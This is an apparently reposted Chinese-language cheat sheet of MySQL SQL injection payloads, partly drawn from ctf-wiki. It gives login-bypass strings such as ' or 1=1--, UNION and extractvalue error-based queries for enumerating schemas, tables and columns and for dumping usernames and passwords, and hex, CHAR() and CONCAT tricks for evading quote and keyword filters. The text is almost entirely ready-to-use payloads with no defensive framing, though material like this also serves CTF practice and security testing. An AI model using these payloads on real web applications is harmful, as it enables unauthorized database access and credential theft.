本文介绍: MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE。用户自定义的表 UNION SELECT TABLE_NAME FROM information_schema.tables WHERE。1,1’,1’‘,1’±,1’’±(双引号带括号)
部分转载ctf-wiki
判闭合形式:
哪个报错就是哪种
1,1’,1’‘,1’±,1’’±(双引号带括号)
万能密码:
admin’ –
admin’ #
admin’/*
’ or 1=1–
’ or 1=1#
’ or 1=1/*
‘) or ‘1’=’1–
‘) or (‘1’=’1–
数据库名:
- SELECT database();
- SELECT schema_name FROM
information_schema.schemata; - extractvalue(1,concat(0x7e,database(),0x7e))
表名
union
-
数据库中的表:
–MySQL 4版本时用version=9,MySQL 5版本时用version=10 UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE
version=10; -
用户自定义的表 UNION SELECT TABLE_NAME FROM information_schema.tables WHERE
TABLE_SCHEMA=database();
报错
- ExtractValue(1,CONCAT(0x5c,(SELECT table_name FROM
information_schema.tables where table_schema=??)));
列名
union
- UNION SELECT GROUP_CONCAT(column_name) FROM
information_schema.columns WHERE table_name = ‘tablename’
报错
- ExtractValue(1,concat(0x7e,(SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_name)like(‘tablename’))))
根据列名查询所在表
- 查询字段名为 username 的表
SELECT table_name FROM information_schema.columns WHERE column_name = ‘username’; - 查询字段名中包含 username 的表
SELECT table_name FROM information_schema.columns WHERE column_name LIKE ‘%user%’;
查数据
union
报错
- extractvalue(1,concat(0x7e,(select(group_concat(concat_ws(username,right(password,20))))from(tablename))))
绕过引号限制
- – hex 编码
SELECT * FROM Users WHERE username = 0x61646D696E - – char() 函数
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
绕过字符串黑名单
- SELECT ‘a’ ‘d’ ‘mi’ ‘n’;
- SELECT CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
- SELECT CONCAT_WS(‘’, ‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
- SELECT GROUP_CONCAT(‘a’, ‘d’, ‘m’, ‘i’, ‘n’);
原文地址:https://blog.csdn.net/qq_41418557/article/details/134696601
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_11207.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。